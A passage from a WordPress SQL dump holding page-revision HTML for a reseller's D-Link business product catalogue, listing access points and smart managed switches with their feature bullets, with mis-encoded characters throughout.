features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>28-Port Layer 3 Lite Smart Managed Gigabit PoE Switch with 4 10G uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Ports 10/100/1000 Base-T PoE + 4 x 10G SFP+ Slots</p><p>â€¢Â Support IEEE 802.3af (PoE) and 802.3at (PoE+) Â with Power Budget of 370W</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>28-Port Layer 3 Lite Smart Managed Gigabit Switch with 4 10G uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Ports 10/100/1000 Base-T PoE + 4 x 10G SFP+ Slots</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>','D-Link','','inherit','closed','closed','','1480-revision-v1','','','2019-09-25 14:25:23','2019-09-25 06:25:23','',1480,'https://bintara.com.my/blog/2019/09/25/1480-revision-v1/',0,'revision','',0),(3393,1,'2019-09-25 14:26:18','2019-09-25 06:26:18','<h2>D - Link Business Solution Product </h2>		\n			<h3>Business Wireless</h3>		\n			<h4>AC1750 Wave 2 Dualâ€‘Band WI-FI PoE Access Pointâ€‹</h4>		\n										<img width=\"300\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-300x300.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-300x300.png 300w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3.png 500w\" sizes=\"(max-width: 300px) 100vw, 300px\" />											\n		<p>Â 802.11ac Wave 2 wireless, up to 1.75 Gbps</p><p>MU-MIMO with beamforming</p><p>Band steering</p><p>Gigabit PoE-capable LAN port</p><p>AP Array utility support</p><p>Free D-Link Central WiFiManager</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>2.4GHz Wireless N300 Outdoor Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600-255x300.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600-255x300.jpg 255w, https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600.jpg 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		<p>Wireless N300 Mbps 2.4GHz Single Band Outdoor Access Point with POE Pass-Through</p><p>Two 10/100 Ethernet ports (one supporting PoE) allow for further physical expansion</p><p>Built-in 10 dBi sector antenna with high power output ensuring that wireless coverage</p><p>Weather-proof design (IPX6) built to withstand harsh environments</p><p>Supports multiple operation modes â€“ AP,WDS with AP, Client, Repeater, WISP Client &amp; Repeater</p><p>Supports 802.1Q VLAN Tagging, operating with multiple SSIDs to segment traffic</p><p>Provides WLAN partitioning for deployments such as wireless hot spots</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>AC1750 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-255x300.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-255x300.png 255w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600.png 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		<p>Up to 1750 MBPS high-speed wireless performance on 802.11ac standards</p><p>Support Wireless Speed of 450 MB over 2.4 GHz &amp; 1300 MbpsÂ  Over 5 GHz band</p><p>Support load balancing to ensure maximum performance by limiting userÂ  per AP</p><p>Support Wi-Fi Multimedia QoS for audio, video, and voice applications</p><p>Six detachable antennas for optimal wireless coverage over 2.4 GHzÂ  or 5 GHz band</p><p>Two Gigabit LAN ports , One Port Support 802.at Power over Ethernet</p><p>Support multiple operation â€“ AP, WDS with AP, WDS/Bridge and Client</p><p>RuggedÂ  metal housing &amp;Â  Plenum-rated chassis</p><p>Built in Radius ServerÂ  allowing users to create their accounts within the device itself.</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>N600 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600-255x300.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600-255x300.png 255w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600.png 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		<p>802.11ac Wave 2 wireless, up to 1.75 Gbps</p><p>MU-MIMO with beamforming</p><p>Band steering</p><p>Gigabit PoE-capable LAN port</p><p>AP Array utility support</p><p>Free D-Link Central WiFiManager</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>AC1300 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600-255x300.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600-255x300.jpg 255w, https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600.jpg 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		<h4 style=\"text-align: center;\">Enjoy High-performance Wireless Connectivity</h4><p style=\"text-align: left;\">Harness the power of IEEE 802.11ac Wave 2 wireless and experience wireless speeds of up to 1300 Mbps, perfect for high-demand business applications</p><h4 style=\"text-align: center;\">MU-MIMO with Beamforming</h4><p>Dramatically improves the wireless range and performance as well as allowing multiple devices to connect simultaneously to the wireless network</p><h4 style=\"text-align: center;\">Multiple Operational Modes</h4><p>Flexible options allows the DAP-2610 to function as an access point, a Wireless Distribution System (WDS), a WDS with access point, or a wireless client</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>N300 Wireless PoE Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600-255x300.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600-255x300.jpg 255w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600.jpg 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		<p>High-speed wireless performance with 300 Mbps wireless signal rates</p><p>Support Wi-fi Multimediaâ„¢ (WMM) for audio, video, and voice applications</p><p>Gigabit Ethernet port with 802.3af Power over EthernetMultiple operation modes: AP, WDS with AP, WDS/Bridgeanf Client</p><p>Support Inbuilt Radius server, Network Access protection (NAP)</p><p>Equipped with 8 VLANs per band for multiple SSIDsÂ  Implementation</p><p>Support Central WiFi Manager to configure and manage multiple AP</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h3>Smart Switch</h3>		\n			<h4>12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 8 Ports 10G Base-T + Two 10 Gigabit SFP+ Slots +2 10GBase-T/SFP+ Combo Slots<br />â€¢ Suitable for virtualization, cloud services and server-to-server applications<br />â€¢ D-link Green Technology conserves energy by powering down unused ports<br />â€¢ Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br />â€¢ Support G.8032 ERPS to achieve high reliability and network stability<br />â€¢ 802.1X port based authentication, for authentication through external RADIUS servers<br />â€¢ Support D-Link Network Assistant Utility to simplifies the configuration<br />â€¢ Loopback Detection automatically disables port or VLAN when a loop is detected<br />â€¢ Support IGMP &amp; MLD Snooping and 802.3x Flow Control</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 8 Ports 10G SFP+, Two 10 Gigabit Base-T /SFP+ Combo Ports<br />â€¢ Suitable for virtualization, cloud services and server-to-server applications<br />â€¢ D-link Green Technology conserves energy by powering down unused ports<br />â€¢ Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br />â€¢ Support G.8032 ERPS to achieve high reliability and network stability<br />â€¢ 802.1X port based authentication, for authentication through external RADIUS servers<br />â€¢ Support D-Link Network Assistant Utility to simplifies the configuration<br />â€¢ Loopback Detection automatically disables port or VLAN when a loop is detected<br />â€¢ Support IGMP &amp; MLD Snooping and 802.3x Flow Control</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>26-Port Layer 2 Lite Smart Managed Gigabit Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Port 10/100/1000 Base-T with 2 Gigabit SFP Ports<br />â€¢ Equipped with 802.3az Energy Efficient Ethernet (EEE) Complaint<br />â€¢ Support IEEE 802.1Q VLAN traffic segregation<br />â€¢ Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br />â€¢ Loopback detection (LBD) and broadcast storm control to avoid network downtime<br />â€¢ Quality of Service (QOS) and bandwidth control to ensure smooth operation<br />â€¢ Cable diagnostics function to help troubleshooting wiring problem<br />â€¢ Support Web-based GUI, Smart Console , Network Assistance Utility</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>10 Gigabit Ethernet Smart Managed Switches</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1.png 510w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1-255x300.png 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>10 Gigabit Ethernet Connection</p><p>Improved Power Efficiency</p><p>Smart and Flexible Management</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>52-Port Layer 2 Smart Managed Gigabit PoE Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 48 Ports 10/100/1000 Base-T PoE + 4 slots for Gigabit SFP<br />â€¢ Support IEEE 802.3af , 802.3at POE with Power Budget up to 740 W<br />â€¢ Equipped with IEEE 802.3az Energy Efficient Ethernet (EEE) Complaint<br />â€¢ Support IEEE 802.1Q VLAN traffic segregation<br />â€¢ Access Control List (ACL) feature to enhances network security<br />â€¢ Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br />â€¢ Loopback detection (LBD) and broadcast storm control to avoid network downtime<br />â€¢ Quality of Service (QOS) and bandwidth control to ensure smooth operation<br />â€¢ Support Web-based GUI, Smart Console , Network Assistance Utility<br />â€¢ Cable diagnostics function to help troubleshooting wiring problem</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>52-Port Layer 3 Lite Smart Managed Gigabit Switch with 2 10G Uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 48 Ports 10/100/1000 Base-T + 2 SFP Ports + 2 x 10G SFP+ Slots</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Built-in SNMP MIB for remote NetworkÂ Management Systems</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>28-Port Layer 3 Lite Smart Managed Gigabit PoE Switch with 4 10G uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Ports 10/100/1000 Base-T PoE + 4 x 10G SFP+ Slots</p><p>â€¢Â Support IEEE 802.3af (PoE) and 802.3at (PoE+) Â with Power Budget of 370W</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>28-Port Layer 3 Lite Smart Managed Gigabit Switch with 4 10G uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Ports 10/100/1000 Base-T PoE + 4 x 10G SFP+ Slots</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>','D-Link','','inherit','closed','closed','','1480-revision-v1','','','2019-09-25 14:26:18','2019-09-25 06:26:18','',1480,'https://bintara.com.my/blog/2019/09/25/1480-revision-v1/',0,'revision','',0),(3394,1,'2019-09-25 14:26:40','2019-09-25 06:26:40','<h2>D - Link Business Solution Product </h2>		\n			<h3>Business Wireless</h3>		\n			<h4>AC1750 Wave 2 Dualâ€‘Band WI-FI PoE Access Pointâ€‹</h4>		\n										<img width=\"300\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-300x300.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-300x300.png 300w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3.png 500w\" sizes=\"(max-width: 300px) 100vw, 300px\" />											\n		<p>Â 802.11ac Wave 2 wireless, up to 1.75 Gbps</p><p>MU-MIMO with beamforming</p><p>Band steering</p><p>Gigabit PoE-capable LAN port</p><p>AP Array utility support</p><p>Free D-Link Central WiFiManager</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>2.4GHz Wireless N300 Outdoor Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600-255x300.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600-255x300.jpg 255w, https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600.jpg 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		<p>Wireless N300 Mbps 2.4GHz Single Band Outdoor Access Point with POE Pass-Through</p><p>Two 10/100 Ethernet ports (one supporting PoE) allow for further physical expansion</p><p>Built-in 10 dBi sector antenna with high power output ensuring that wireless coverage</p><p>Weather-proof design (IPX6) built to withstand harsh environments</p><p>Supports multiple operation modes â€“ AP,WDS with AP, Client, Repeater, WISP Client &amp; Repeater</p><p>Supports 802.1Q VLAN Tagging, operating with multiple SSIDs to segment traffic</p><p>Provides WLAN partitioning for deployments such as wireless hot spots</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>AC1750 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-255x300.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-255x300.png 255w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600.png 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		<p>Up to 1750 MBPS high-speed wireless performance on 802.11ac standards</p><p>Support Wireless Speed of 450 MB over 2.4 GHz &amp; 1300 MbpsÂ  Over 5 GHz band</p><p>Support load balancing to ensure maximum performance by limiting userÂ  per AP</p><p>Support Wi-Fi Multimedia QoS for audio, video, and voice applications</p><p>Six detachable antennas for optimal wireless coverage over 2.4 GHzÂ  or 5 GHz band</p><p>Two Gigabit LAN ports , One Port Support 802.at Power over Ethernet</p><p>Support multiple operation â€“ AP, WDS with AP, WDS/Bridge and Client</p><p>RuggedÂ  metal housing &amp;Â  Plenum-rated chassis</p><p>Built in Radius ServerÂ  allowing users to create their accounts within the device itself.</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>N600 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600-255x300.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600-255x300.png 255w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600.png 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		<p>802.11ac Wave 2 wireless, up to 1.75 Gbps</p><p>MU-MIMO with beamforming</p><p>Band steering</p><p>Gigabit PoE-capable LAN port</p><p>AP Array utility support</p><p>Free D-Link Central WiFiManager</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>AC1300 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600-255x300.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600-255x300.jpg 255w, https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600.jpg 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		<h4 style=\"text-align: center;\">Enjoy High-performance Wireless Connectivity</h4><p style=\"text-align: left;\">Harness the power of IEEE 802.11ac Wave 2 wireless and experience wireless speeds of up to 1300 Mbps, perfect for high-demand business applications</p><h4 style=\"text-align: center;\">MU-MIMO with Beamforming</h4><p>Dramatically improves the wireless range and performance as well as allowing multiple devices to connect simultaneously to the wireless network</p><h4 style=\"text-align: center;\">Multiple Operational Modes</h4><p>Flexible options allows the DAP-2610 to function as an access point, a Wireless Distribution System (WDS), a WDS with access point, or a wireless client</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>N300 Wireless PoE Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600-255x300.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600-255x300.jpg 255w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600.jpg 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		<p>High-speed wireless performance with 300 Mbps wireless signal rates</p><p>Support Wi-fi Multimediaâ„¢ (WMM) for audio, video, and voice applications</p><p>Gigabit Ethernet port with 802.3af Power over EthernetMultiple operation modes: AP, WDS with AP, WDS/Bridgeanf Client</p><p>Support Inbuilt Radius server, Network Access protection (NAP)</p><p>Equipped with 8 VLANs per band for multiple SSIDsÂ  Implementation</p><p>Support Central WiFi Manager to configure and manage multiple AP</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h3>Smart Switch</h3>		\n			<h4>12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 8 Ports 10G Base-T + Two 10 Gigabit SFP+ Slots +2 10GBase-T/SFP+ Combo Slots<br />â€¢ Suitable for virtualization, cloud services and server-to-server applications<br />â€¢ D-link Green Technology conserves energy by powering down unused ports<br />â€¢ Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br />â€¢ Support G.8032 ERPS to achieve high reliability and network stability<br />â€¢ 802.1X port based authentication, for authentication through external RADIUS servers<br />â€¢ Support D-Link Network Assistant Utility to simplifies the configuration<br />â€¢ Loopback Detection automatically disables port or VLAN when a loop is detected<br />â€¢ Support IGMP &amp; MLD Snooping and 802.3x Flow Control</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 8 Ports 10G SFP+, Two 10 Gigabit Base-T /SFP+ Combo Ports<br />â€¢ Suitable for virtualization, cloud services and server-to-server applications<br />â€¢ D-link Green Technology conserves energy by powering down unused ports<br />â€¢ Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br />â€¢ Support G.8032 ERPS to achieve high reliability and network stability<br />â€¢ 802.1X port based authentication, for authentication through external RADIUS servers<br />â€¢ Support D-Link Network Assistant Utility to simplifies the configuration<br />â€¢ Loopback Detection automatically disables port or VLAN when a loop is detected<br />â€¢ Support IGMP &amp; MLD Snooping and 802.3x Flow Control</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>26-Port Layer 2 Lite Smart Managed Gigabit Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Port 10/100/1000 Base-T with 2 Gigabit SFP Ports<br />â€¢ Equipped with 802.3az Energy Efficient Ethernet (EEE) Complaint<br />â€¢ Support IEEE 802.1Q VLAN traffic segregation<br />â€¢ Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br />â€¢ Loopback detection (LBD) and broadcast storm control to avoid network downtime<br />â€¢ Quality of Service (QOS) and bandwidth control to ensure smooth operation<br />â€¢ Cable diagnostics function to help troubleshooting wiring problem<br />â€¢ Support Web-based GUI, Smart Console , Network Assistance Utility</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>10 Gigabit Ethernet Smart Managed Switches</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1.png 510w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1-255x300.png 